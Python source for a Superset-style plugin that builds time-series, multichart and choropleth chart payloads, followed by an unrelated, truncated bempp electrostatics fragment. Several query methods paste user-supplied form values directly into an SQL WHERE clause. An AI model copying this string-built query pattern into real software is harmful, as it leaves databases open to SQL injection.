return self.datasource.database.cache_timeout
return config.get("CACHE_DEFAULT_TIMEOUT")
def get_json(self, force=False):
return json.dumps(
self.get_payload(force),
default=utils.json_int_dttm_ser, ignore_nan=True)
@property
def cache_key(self):
s = str([(k, self.form_data[k]) for k in sorted(self.form_data.keys())])
return hashlib.md5(s.encode('utf-8')).hexdigest()
def get_payload(self, force=False):
"""Handles caching around the json payload retrieval"""
cache_key = self.cache_key
payload = None
force = force if force else self.form_data.get('force') == 'true'
if not force and cache:
payload = cache.get(cache_key)
if payload:
            stats_logger.incr('loaded_from_cache')
is_cached = True
try:
cached_data = zlib.decompress(payload)
if PY3:
cached_data = cached_data.decode('utf-8')
payload = json.loads(cached_data)
except Exception as e:
logging.error("Error reading cache: " +
utils.error_msg_from_exception(e))
payload = None
logging.info("Serving from cache")
if not payload:
            stats_logger.incr('loaded_from_source')
data = None
is_cached = False
cache_timeout = self.cache_timeout
stacktrace = None
try:
df = self.get_df()
if not self.error_message:
data = self.get_data(df)
except Exception as e:
logging.exception(e)
if not self.error_message:
self.error_message = str(e)
self.status = utils.QueryStatus.FAILED
data = None
stacktrace = traceback.format_exc()
payload = {
'cache_key': cache_key,
'cache_timeout': cache_timeout,
'data': data,
'error': self.error_message,
'form_data': self.form_data,
'query': self.query,
'status': self.status,
'stacktrace': stacktrace,
}
payload['cached_dttm'] = datetime.utcnow().isoformat().split('.')[0]
logging.info("Caching for the next {} seconds".format(
cache_timeout))
data = self.json_dumps(payload)
if PY3:
data = bytes(data, 'utf-8')
if cache and self.status != utils.QueryStatus.FAILED:
try:
cache.set(
cache_key,
zlib.compress(data),
timeout=cache_timeout)
except Exception as e:
# cache.set call can fail if the backend is down or if
# the key is too large or whatever other reasons
logging.warning("Could not cache key {}".format(cache_key))
logging.exception(e)
cache.delete(cache_key)
payload['is_cached'] = is_cached
return payload
def json_dumps(self, obj):
return json.dumps(obj, default=utils.json_int_dttm_ser, ignore_nan=True)
@property
def data(self):
"""This is the data object serialized to the js layer"""
content = {
'form_data': self.form_data,
'token': self.token,
'viz_name': self.viz_type,
'filter_select_enabled': self.datasource.filter_select_enabled,
}
return content
def get_csv(self):
df = self.get_df()
include_index = not isinstance(df.index, pd.RangeIndex)
return df.to_csv(index=include_index, encoding="utf-8")
def get_data(self, df):
return []
@property
def json_data(self):
return json.dumps(self.data)
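# Hedged sketch (illustrative only, not part of the original plugin): the caching round-trip
# performed by SimpleFlowViz.get_payload above -- the payload dict is JSON-serialized,
# zlib-compressed for storage, then decompressed and parsed again on a cache hit.
# The payload content below is made up.
def _example_payload_cache_roundtrip():
    payload = {'data': [1, 2, 3], 'status': 'success'}
    stored = zlib.compress(bytes(json.dumps(payload), 'utf-8'))
    restored = json.loads(zlib.decompress(stored).decode('utf-8'))
    return restored == payload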
class SimpleFlowTsViz(SimpleFlowViz):
"""A rich line chart component with tons of options"""
viz_type = "simpleflow_line"
#viz_type = "line"
verbose_name = _("Time Series - Line Chart")
sort_series = False
is_timeseries = True
def to_series(self, df, classed='', title_suffix=''):
print('SimpleFlowTimeSeriesViz to_series df')
#print(df)
cols = []
for col in df.columns:
if col == '':
cols.append('N/A')
elif col is None:
cols.append('NULL')
else:
cols.append(col)
df.columns = cols
series = df.to_dict('series')
chart_data = []
for name in df.T.index.tolist():
ys = series[name]
if df[name].dtype.kind not in "biufc":
continue
if isinstance(name, string_types):
series_title = name
else:
name = ["{}".format(s) for s in name]
if len(self.form_data.get('metrics')) > 1:
series_title = ", ".join(name)
else:
series_title = ", ".join(name[1:])
if title_suffix:
series_title += title_suffix
d = {
"key": series_title,
"classed": classed,
"values": [
{'x': ds, 'y': ys[ds] if ds in ys else None}
for ds in df.index
],
}
chart_data.append(d)
return chart_data
def get_data(self, df):
fd = self.form_data
#df = df.fillna(0)
query_object = self.query_obj()
df = self.get_df(query_object)
df = df.fillna(0)
print("SimpleFlowTimeSeriesViz get_data, df")
#print(fd)
if fd.get("granularity") == "all":
raise Exception("Pick a time granularity for your time series")
df = df.pivot_table(
index=DTTM_ALIAS,
columns=fd.get('groupby'),
values=fd.get('metrics'))
fm = fd.get("resample_fillmethod")
if not fm:
fm = None
how = fd.get("resample_how")
rule = fd.get("resample_rule")
if how and rule:
df = df.resample(rule, how=how, fill_method=fm)
if not fm:
df = df.fillna(0)
if self.sort_series:
dfs = df.sum()
dfs.sort_values(ascending=False, inplace=True)
df = df[dfs.index]
if fd.get("contribution"):
dft = df.T
df = (dft / dft.sum()).T
rolling_periods = fd.get("rolling_periods")
rolling_type = fd.get("rolling_type")
if rolling_type in ('mean', 'std', 'sum') and rolling_periods:
if rolling_type == 'mean':
df = pd.rolling_mean(df, int(rolling_periods), min_periods=0)
elif rolling_type == 'std':
df = pd.rolling_std(df, int(rolling_periods), min_periods=0)
elif rolling_type == 'sum':
df = pd.rolling_sum(df, int(rolling_periods), min_periods=0)
elif rolling_type == 'cumsum':
df = df.cumsum()
num_period_compare = fd.get("num_period_compare")
if num_period_compare:
num_period_compare = int(num_period_compare)
prt = fd.get('period_ratio_type')
if prt and prt == 'growth':
df = (df / df.shift(num_period_compare)) - 1
elif prt and prt == 'value':
df = df - df.shift(num_period_compare)
else:
df = df / df.shift(num_period_compare)
df = df[num_period_compare:]
chart_data = self.to_series(df)
time_compare = fd.get('time_compare')
if time_compare:
query_object = self.query_obj()
delta = utils.parse_human_timedelta(time_compare)
query_object['inner_from_dttm'] = query_object['from_dttm']
query_object['inner_to_dttm'] = query_object['to_dttm']
query_object['from_dttm'] -= delta
query_object['to_dttm'] -= delta
df2 = self.get_df(query_object)
df2[DTTM_ALIAS] += delta
df2 = df2.pivot_table(
index=DTTM_ALIAS,
columns=fd.get('groupby'),
values=fd.get('metrics'))
chart_data += self.to_series(
df2, classed='superset', title_suffix="---")
chart_data = sorted(chart_data, key=lambda x: x['key'])
return chart_data
    ## override the base class's query_obj method
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
groupby = form_data.get("groupby") or []
metrics = form_data.get("metrics") or []
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
        # __from and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or
config.get("SUPERSET_DEFAULT_SINCE", "1 year ago")
)
from_dttm = utils.parse_human_datetime(since)
now = datetime.now()
if from_dttm > now:
from_dttm = now - (from_dttm - now)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm > to_dttm:
raise Exception("From date cannot be larger than to date")
## extras are used to query elements specific to a datasource type
## for instance the extra where clause that applies only to Tables
        print(form_data)
where_filter_str = ""
        ## build the filters for the dashboard, since the slice is now integrated with the dashboard
dashboard_filter_array = []
try:
##mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"country_code"}'
##form_data_db_mask = json.loads(mask_json)
where_filter_array = []
for attr, value in form_data.items():
if (form_data_db_mask.get(str(attr), None) is not None) and (value is not None) and value and not any(isinstance(sublist, list) for sublist in value) and len(value) > 0 :
where_filter = form_data_db_mask.get(str(attr)) + " in ( " + ",".join(value) + ")"
where_filter_array.append(where_filter)
## build the dashboard_filter_array
dashboard_filter_array += [{
'col': form_data_db_mask.get(str(attr)),
'op': 'in',
'val': map(int, value),
}]
if len(where_filter_array) > 0 :
where_filter_str = " and ".join(where_filter_array)
## sample format: age_group_id in ( 1,2,22) and model_id in ( 46,4,7,10,,108,28,38,94,106) and sex_id in ( 3)
print("plugins/internal/simpleflow.py where_filter_str, dashboard_filter_array", dashboard_filter_array, where_filter_str)
except Exception as e:
logging.exception(e)
print("plugins/internal/simpleflow.py exception form_data fields in viz.py is not iterable");
default_form_data_json = '{"resample_fillmethod": null, "show_brush": false, "line_interpolation": "linear", "show_legend": true, "filters": [], "granularity_sqla": "year", "rolling_type": "null", "show_markers": false, "since": "100 years ago", "time_compare": null, "until": "5057", "resample_rule": null, "period_ratio_type": "growth", "metrics": ["avg__model_id", "avg__rt_mean"], "timeseries_limit_metric": null, "resample_how": null, "slice_id": 177, "num_period_compare": "", "viz_type_superset": "table", "level_group": "1", "groupby": ["model_name"], "rich_tooltip": true, "limit": 5000, "datasource": "108__table", "x_axis_showminmax": true, "contribution": false, "time_grain_sqla": "Time Column"}'
default_form_data = json.loads(default_form_data_json)
form_data.update(default_form_data)
#print("plugins/internal/simpleflow.py form_data", form_data, default_form_data)
extras = {
#'where': form_data.get("where", ''),
'where': where_filter_str,
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters') \
if 'having_filters' in form_data else [],
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
#print(extras)
filters = []
#filters = form_data['filters'] if 'filters' in form_data \
# else []
#for col, vals in self.get_extra_filters().items():
# if not (col and vals) or col.startswith('__'):
# continue
# elif col in self.datasource.filterable_column_names:
# # Quote values with comma to avoid conflict
# filters += [{
# 'col': col,
# 'op': 'in',
# 'val': vals,
# }]
## sample format: [{u'col': u'country_code', u'val': [u'ALB', u'DZA', u'ASM', u'ADO', u'ATG'], u'op': u'in'}]
filters.extend(dashboard_filter_array)
print('plugins/internal/simpleflow.py simpleflow_line query_obj filters', filters, dashboard_filter_array, form_data['filters'])
#data-set for controlSetRows
vis_container_id = form_data.get("viscontainer_group", 1)
vis_id = form_data.get("vistype_group", 1)
viz_type_form = form_data.get("viz_type",1)
search_setting = self.baseGraph.get_search_setting_graph_db(viz_type_form, vis_container_id, vis_id)
#build setting array
panel = {}
sections = []
rows = []
row = []
section_name_index = 1
row_name_index = 2
control_name_index = 3
if len(search_setting) > 0:
section_name = search_setting[0][section_name_index]
row_name = search_setting[0][row_name_index]
counter = 0
for r in search_setting:
                ### new rows; search_setting has to be ordered by section_name
if section_name != r[section_name_index] :
sections.append({"label": section_name,"description": section_name, "controlSetRows":rows})
section_name = r[section_name_index]
rows = []
row.append(r[control_name_index])
rows.append(row)
row = []
### append the last section
sections.append({"label": section_name,"description": section_name, "controlSetRows":rows})
form_data['search_dependencies_controlSections'] = sections
##rebuild form_data for data from graph-db
search_categories = self.baseGraph.get_search_categories_graph_db(viz_type_form, vis_container_id, vis_id)
search_categories_array = []
        ##clear all form_data related to settings; this could be more efficient
for r in search_categories:
if r[2] != 'model_version':
form_data[r[2]] = []
for r in search_categories:
name = r[2]
#print('search_categories, r, name', r, name)
if r[2] == 'model_version':
name = 'sf_model_version'
if name not in form_data or type(form_data[name]) is not list:
form_data[name] = []
form_data[name].append([r[0],r[1]])
a = { "ID": r[0], "NAME": r[1], "CAT": r[2] }
search_categories_array.append(a)
#attach graph data to form_data
        form_data['graph_search_categories'] = search_categories_array
###
### like to keep these example code which shows how the control-sections
### control-rows and controls are formated in the frontend to generate
### controlpancel inputs
###
##data-set for controlSetRows
#controlSections = []
#controlSetRows = []
#controlSetRows.append(["viz_type"])
#controlSetRows.append(["viscontainer_group"])
#controlSetRows.append(["vistype_group"])
#controlSetRows.append(["measure"])
#controlSetRows.append(["cause"])
#controlSetRows.append(["risk"])
#controlSetRows.append(["age_select"])
#controlSetRows.append(["location"])
#controlSetRows.append(["model_group"])
##controlSetRows.append(["metrics"])
##controlSetRows.append(["groupby"])
##controlSetRows.append(["limit", "timeseries_limit_metric"])
#section = {
# 'label': 'section 1',
# 'description': 'descrition 1',
# 'controlSetRows': controlSetRows,
#}
#controlSections.append(section)
#controlSetRows = []
#controlSetRows.append(["rate_of_change_switch"])
#controlSetRows.append(["year_group"])
#controlSetRows.append(["level_group"])
#controlSetRows.append(["sex_group"])
#controlSetRows.append(["unit_group"])
##controlSetRows.append(["show_brush", "show_legend"])
##controlSetRows.append( ["rich_tooltip"])
##controlSetRows.append(["show_markers", "x_axis_showminmax"])
##controlSetRows.append(["line_interpolation", "contribution"])
#section = {
# 'label': 'section 2',
# 'description': 'descrition 2',
# 'controlSetRows': controlSetRows,
#}
#controlSections.append(section)
##controlSetRows = []
##controlSetRows.append(["rolling_type", "rolling_periods"])
##controlSetRows.append(["time_compare"])
##controlSetRows.append(["num_period_compare", "period_ratio_type"])
##controlSetRows.append(["resample_how", "resample_rule"])
##controlSetRows.append(["resample_fillmethod"])
##section = {
## 'label': 'section 3',
## 'description': 'descrition 3',
## 'controlSetRows': controlSetRows,
##}
##controlSections.append(section)
#form_data['search_dependencies_controlSections'] = controlSections
##print('form_data')
##print(form_data)
#end of
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': self.is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
'timeseries_limit': limit,
'extras': extras,
'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
}
#print(d)
return d
class SimpleflowTsMultiChartViz(SimpleFlowTsViz):
"""A multichart """
viz_type = "simpleflow_multichart"
sort_series = False
verbose_name = _("MultiChart")
#is_timeseries = True
is_timeseries = False
    # override parent query_obj
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
groupby = form_data.get("groupby") or []
#groupby = []
metrics = form_data.get("metrics") or []
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
#timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
        ## __from and __to are special extra_filters that target time
## boundaries. The rest of extra_filters are simple
## [column_name in list_of_values]. `__` prefix is there to avoid
## potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or
config.get("SUPERSET_DEFAULT_SINCE", "1 year ago")
)
from_dttm = utils.parse_human_datetime(since)
now = datetime.now()
if from_dttm > now:
from_dttm = now - (from_dttm - now)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm > to_dttm:
raise Exception("From date cannot be larger than to date")
## extras are used to query elements specific to a datasource type
## for instance the extra where clause that applies only to Tables
extras = {
#'where': form_data.get("where", ''),
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters') \
if 'having_filters' in form_data else [],
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
filters = form_data['filters'] if 'filters' in form_data \
else []
for col, vals in self.get_extra_filters().items():
if not (col and vals) or col.startswith('__'):
continue
elif col in self.datasource.filterable_column_names:
# Quote values with comma to avoid conflict
filters += [{
'col': col,
'op': 'in',
'val': vals,
}]
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': self.is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
#'timeseries_limit': limit,
'extras': extras,
#'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
}
#print('NVD3MultiChartViz query_obj')
#print(d)
return d
def to_series(self, df, classed='', title_suffix=''):
        # TODO: change to addressing columns by sequence rather than by column name:
# column-0 is x
# column-1 is y
# column-2 is type-id
# column-4 is yAxis
# column-3 is name-id
# for this setting, df.columns[2] is 'avg__plot_name_id'
# gb = df.groupby('avg__plot_name_id', sort=True)
#print('NVD3MultiChartViz to_series --df, columns')
#print(df)
#print(df.columns)
#gb = df.groupby(df.columns[1])
gb = df.groupby('plot_name_id')
chart_data = []
for name, group in gb:
#print('--group')
#print(name)
#print(group)
values = []
plot_type_id = ''
# index is column-0 which is x
for index, row in group.iterrows():
#print('--index')
#print(index)
if ( plot_type_id == '' ):
#plot_type_id = row[df.columns[2]]
plot_type_id = row['plot_type_id']
size = 1
height = 1
std = 0
#for backward support
if 'avg__x_std' in row:
size = row['avg__x_std']
if 'avg__y_std' in row:
height = row['avg__y_std']
#new format for diff
if 'avg__x_diff' in row:
size = row['avg__x_diff']
if 'avg__y_diff' in row:
height = row['avg__y_diff']
if 'avg__std' in row:
std = row['avg__std']
v = {
"x": row['__timestamp'],
"y":row['avg__y'],
"size": size,
"height": height,
#"shape":"cross",
"shape":"dpoint",
"std": std,
}
#print('shape dataset')
#print(v)
values.append(v)
#print('--value')
#print(values)
plot_type = 'line'
if ( plot_type_id == 1 ):
plot_type = 'scatter'
elif ( plot_type_id == 2 ):
plot_type = 'line'
elif ( plot_type_id == 3 ):
plot_type = 'area'
elif ( plot_type_id == 4 ):
plot_type = 'bar'
else:
plot_type = 'scatter'
d = {
"key": name,
"classed": classed,
"values": values,
#added for multichart,
"yAxis": 1,
"type": plot_type,
}
chart_data.append(d)
return chart_data
def get_data(self, df):
#print('NVD3MultiChartViz get_data df, form_data')
fd = self.form_data
#print(df)
chart_data = self.to_series(df)
time_compare = fd.get('time_compare')
if time_compare:
query_object = self.query_obj()
delta = utils.parse_human_timedelta(time_compare)
query_object['inner_from_dttm'] = query_object['from_dttm']
query_object['inner_to_dttm'] = query_object['to_dttm']
query_object['from_dttm'] -= delta
query_object['to_dttm'] -= delta
df2 = self.get_df(query_object)
df2[DTTM_ALIAS] += delta
df2 = df2.pivot_table(
index=DTTM_ALIAS,
columns=fd.get('groupby'),
values=fd.get('metrics'))
chart_data += self.to_series(
df2, classed='superset', title_suffix="---")
chart_data = sorted(chart_data, key=lambda x: x['key'])
return chart_data
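# Hedged sketch (illustrative only): the plot_type_id -> series type mapping used in
# SimpleflowTsMultiChartViz.to_series above, expressed as a lookup table with the same
# 'scatter' fallback. Names prefixed with _example are not part of the original plugin.
_EXAMPLE_PLOT_TYPE_BY_ID = {1: 'scatter', 2: 'line', 3: 'area', 4: 'bar'}
def _example_plot_type(plot_type_id):
    return _EXAMPLE_PLOT_TYPE_BY_ID.get(plot_type_id, 'scatter')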
class SimpleFlowTsBarViz(SimpleFlowTsViz):
"""A bar chart where the x axis is time"""
#viz_type = "bar"
viz_type = "simpleflow_bar"
sort_series = True
verbose_name = _("Time Series - Bar Chart")
class SimpleFlowTsCompareViz(SimpleFlowTsViz):
"""A line chart component where you can compare the % change over time"""
#viz_type = 'compare'
viz_type = 'simpleflow_compare'
verbose_name = _("Time Series - Percent Change")
class SimpleFlowTsStackedViz(SimpleFlowTsViz):
"""A rich stack area chart"""
#viz_type = "area"
viz_type = "simpleflow_area"
verbose_name = _("Time Series - Stacked")
sort_series = True
class IHMEChoroplethViz(SimpleFlowTsViz):
"""A rich stack area chart"""
viz_type = "ihme_choropleth"
verbose_name = _("Choropleth Map")
sort_series = True
    # override parent query_obj
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
groupby = form_data.get("groupby") or []
metrics = form_data.get("metrics") or []
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
        # __from and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or
config.get("SUPERSET_DEFAULT_SINCE", "1 year ago")
)
from_dttm = utils.parse_human_datetime(since)
now = datetime.now()
if from_dttm > now:
from_dttm = now - (from_dttm - now)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm > to_dttm:
raise Exception("From date cannot be larger than to date")
## extras are used to query elements specific to a datasource type
## for instance the extra where clause that applies only to Tables
where_filter_str = ""
        ## build the filters for the dashboard, since the slice is now integrated with the dashboard
dashboard_filter_array = []
try:
##mask_json = '{"model_group":"model_id","sex_group":"sex_id","age_select":"age_group_id","location":"country_code"}'
##form_data_db_mask = json.loads(mask_json)
where_filter_array = []
for attr, value in form_data.items():
#print("plugins/internal/simpleflow.py IHMEChoroplethViz looking at form_data.items() attr, value", attr, value)
                ## the conditions are getting too long; rewrite the following code
                ## 'not any(isinstance(sublist, list) for sublist in value)' checks whether 'value' is [[]], which means
                ## no items are selected; in that case there is no need to filter, since all items will be selected anyway.
if (form_data_db_mask.get(str(attr), None) is not None) and (value is not None) and value and not any(isinstance(sublist, list) for sublist in value) and len(value) > 0 :
where_filter = form_data_db_mask.get(str(attr)) + " in ( " + ",".join(value) + ")"
where_filter_array.append(where_filter)
## build the dashboard_filter_array
dashboard_filter_array += [{
'col': form_data_db_mask.get(str(attr)),
'op': 'in',
'val': map(int, value),
}]
if len(where_filter_array) > 0 :
where_filter_str = " and ".join(where_filter_array)
## sample format: age_group_id in ( 1,2,22) and model_id in ( 46,4,7,10,,108,28,38,94,106) and sex_id in ( 3)
print("plugins/internal/simpleflow.py IHMEChoroplethViz where_filter_str, dashboard_filter_array", dashboard_filter_array, where_filter_str)
except Exception as e:
logging.exception(e)
print("plugins/internal/simpleflow.py IHMEChoroplethViz exception form_data fields in viz.py is not iterable");
        ### between the inherited classes only this setting differs; they could be merged into one
default_form_data_json = '{"resample_fillmethod": null, "show_brush": false, "line_interpolation": "linear", "show_legend": true, "filters": [], "granularity_sqla": "year", "rolling_type": "null", "show_markers": false, "since": "100 years ago", "time_compare": null, "until": "5057", "resample_rule": null, "period_ratio_type": "growth", "metrics": ["avg__model_id", "avg__rt_mean", "avg__location_id","avg__year"], "timeseries_limit_metric": null, "resample_how": null, "slice_id": 177, "num_period_compare": "", "viz_type_superset": "table", "level_group": "1", "groupby": ["id"], "rich_tooltip": true, "limit": 5000, "datasource": "108__table", "x_axis_showminmax": true, "contribution": false, "time_grain_sqla": "Time Column"}'
default_form_data = json.loads(default_form_data_json)
#print("plugins/internal/simpleflow.py IHMEChoroplethViz form_data before update", form_data);
form_data.update(default_form_data)
#print("plugins/internal/simpleflow.py IHMEChoroplethViz form_data", form_data, default_form_data)
extras = {
#'where': form_data.get("where", ''),
'where': where_filter_str,
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters') \
if 'having_filters' in form_data else [],
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
#print(extras)
filters = []
filters.extend(dashboard_filter_array)
print('plugins/internal/simpleflow.py ihme_choropleth query_obj filters', dashboard_filter_array, filters, form_data['filters'])
#data-set for controlSetRows
vis_container_id = form_data.get("viscontainer_group", 1)
vis_id = form_data.get("vistype_group", 1)
viz_type_form = form_data.get("viz_type",1)
search_setting = self.baseGraph.get_search_setting_graph_db(viz_type_form, vis_container_id, vis_id)
#build setting array
panel = {}
sections = []
rows = []
row = []
section_name_index = 1
row_name_index = 2
control_name_index = 3
if len(search_setting) > 0:
section_name = search_setting[0][section_name_index]
row_name = search_setting[0][row_name_index]
counter = 0
for r in search_setting:
                ### new rows; search_setting has to be ordered by section_name
if section_name != r[section_name_index] :
sections.append({"label": section_name,"description": section_name, "controlSetRows":rows})
section_name = r[section_name_index]
rows = []
row.append(r[control_name_index])
rows.append(row)
row = []
### append the last section
sections.append({"label": section_name,"description": section_name, "controlSetRows":rows})
form_data['search_dependencies_controlSections'] = sections
##rebuild form_data for data from graph-db
search_categories = self.baseGraph.get_search_categories_graph_db(viz_type_form, vis_container_id, vis_id)
search_categories_array = []
        ##clear all form_data related to settings; this could be more efficient
for r in search_categories:
if r[2] != 'model_version':
form_data[r[2]] = []
for r in search_categories:
name = r[2]
#print('search_categories, r, name', r, name)
if r[2] == 'model_version':
name = 'sf_model_version'
if name not in form_data or type(form_data[name]) is not list:
form_data[name] = []
            ### need to clean up the form data, otherwise duplicated form data may be added
#print("plugins/internal/simpleflow.py form_data", name, form_data[name])
form_data[name].append([r[0],r[1]])
#print("plugins/internal/simpleflow.py form_data append", name, form_data[name])
a = { "ID": r[0], "NAME": r[1], "CAT": r[2] }
search_categories_array.append(a)
#attach graph data to form_data
        form_data['graph_search_categories'] = search_categories_array
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': self.is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
'timeseries_limit': limit,
'extras': extras,
'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
}
#print(d)
return d
def get_payload(self, force=False):
"""Handles caching around the json payload retrieval"""
cache_key = self.cache_key
payload = None
force = force if force else self.form_data.get('force') == 'true'
if not force and cache:
payload = cache.get(cache_key)
if payload:
            stats_logger.incr('loaded_from_cache')
is_cached = True
try:
cached_data = zlib.decompress(payload)
if PY3:
cached_data = cached_data.decode('utf-8')
payload = json.loads(cached_data)
except Exception as e:
logging.error("Error reading cache: " +
utils.error_msg_from_exception(e))
payload = None
logging.info("Serving from cache")
if not payload:
            stats_logger.incr('loaded_from_source')
data = None
is_cached = False
cache_timeout = self.cache_timeout
stacktrace = None
try:
df = self.get_df()
if not self.error_message:
data = self.get_data(df)
#df = None
#data = self.get_data(df)
except Exception as e:
logging.exception(e)
if not self.error_message:
self.error_message = str(e)
self.status = utils.QueryStatus.FAILED
data = None
stacktrace = traceback.format_exc()
payload = {
'cache_key': cache_key,
'cache_timeout': cache_timeout,
'data': data,
'error': self.error_message,
'form_data': self.form_data,
'query': self.query,
'status': self.status,
'stacktrace': stacktrace,
}
#print('plugins/internal/simpleflow.py IHMEChoroplethViz payload, data', payload, data);
payload['cached_dttm'] = datetime.utcnow().isoformat().split('.')[0]
logging.info("Caching for the next {} seconds".format(
cache_timeout))
data = self.json_dumps(payload)
if PY3:
data = bytes(data, 'utf-8')
if cache and self.status != utils.QueryStatus.FAILED:
try:
cache.set(
cache_key,
zlib.compress(data),
timeout=cache_timeout)
except Exception as e:
# cache.set call can fail if the backend is down or if
# the key is too large or whatever other reasons
logging.warning("Could not cache key {}".format(cache_key))
logging.exception(e)
cache.delete(cache_key)
payload['is_cached'] = is_cached
return payload
def get_data(self, df):
query_object = self.query_obj()
df = self.get_df(query_object)
df = df.fillna(0)
chart_data = self.to_series(df)
return chart_data
def to_series(self, df, classed='', title_suffix=''):
chart_data = []
for index, row in df.iterrows():
#print("IHMEChoroplethViz to_series iterrows index, row", index, row, row.to_dict(), df.columns)
d = {
"id": str(index+1),
"mean": row['avg__rt_mean']*100, # x100 to show color on map,
"year_id": int(row['avg__year']), #row['__timestamp'], #need to change to 'year'
"loc_id": str(int(row['avg__location_id']))
}
chart_data.append(d)
#print("IHMEChoroplethViz to_series columns ", dir(df.columns))
#for index, member in enumerate(df.columns.tolist()):
# print("IHMEChoroplethViz to_series columns ", index, member, df.columns[index])
###builds five columns needed for choropleth map dataset
#IHMEChoroplethViz get_data columns 0 model_name model_name
#IHMEChoroplethViz get_data columns 1 __timestamp __timestamp
#IHMEChoroplethViz get_data columns 2 avg__model_id avg__model_id
#IHMEChoroplethViz get_data columns 3 avg__rt_mean avg__rt_mean
#IHMEChoroplethViz get_data columns 4 avg__location_id avg__location_id
return chart_data
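# Hedged sketch (illustrative only, not part of the original plugin): the dashboard-filter
# translation performed inside the query_obj methods above, factored into a standalone helper.
# Control names in form_data are mapped to database columns via form_data_db_mask and the
# selected values become "col in (...)" filters. The sample form_data below is made up.
def _example_dashboard_filters(form_data):
    filters = []
    for attr, value in form_data.items():
        col = form_data_db_mask.get(str(attr))
        if col is not None and value:
            filters.append({'col': col, 'op': 'in', 'val': [int(v) for v in value]})
    return filters
# _example_dashboard_filters({'sex_group': ['3'], 'age_select': ['1', '2', '22']}) yields
# [{'col': 'sex_id', 'op': 'in', 'val': [3]}, {'col': 'age_group_id', 'op': 'in', 'val': [1, 2, 22]}]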
|
import numpy as np
import bempp.api
def direct(dirichl_space, neumann_space, q, x_q, ep_in, ep_out, kappa, operator_assembler):
from bempp.api.operators.boundary import sparse, laplace, modified_helmholtz
identity = sparse.identity(dirichl_space, dirichl_space, dirichl_space)
slp_in = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)
dlp_in = laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)
slp_out = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
dlp_out = modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
# Matrix Assembly
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = 0.5*identity + dlp_in
A[0, 1] = -slp_in
A[1, 0] = 0.5*identity - dlp_out
A[1, 1] = (ep_in/ep_out)*slp_out
@bempp.api.real_callable
def charges_fun(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
aux = np.sum(q/nrm)
result[0] = aux/(4*np.pi*ep_in)
@bempp.api.real_callable
def zero(x, n, domain_index, result):
result[0] = 0
rhs_1 = bempp.api.GridFunction(dirichl_space, fun=charges_fun)
rhs_2 = bempp.api.GridFunction(neumann_space, fun=zero)
return A, rhs_1, rhs_2
def juffer(dirichl_space, neumann_space, q, x_q, ep_in, ep_ex, kappa, operator_assembler):
from bempp.api.operators.boundary import sparse, laplace, modified_helmholtz
phi_id = sparse.identity(dirichl_space, dirichl_space, dirichl_space)
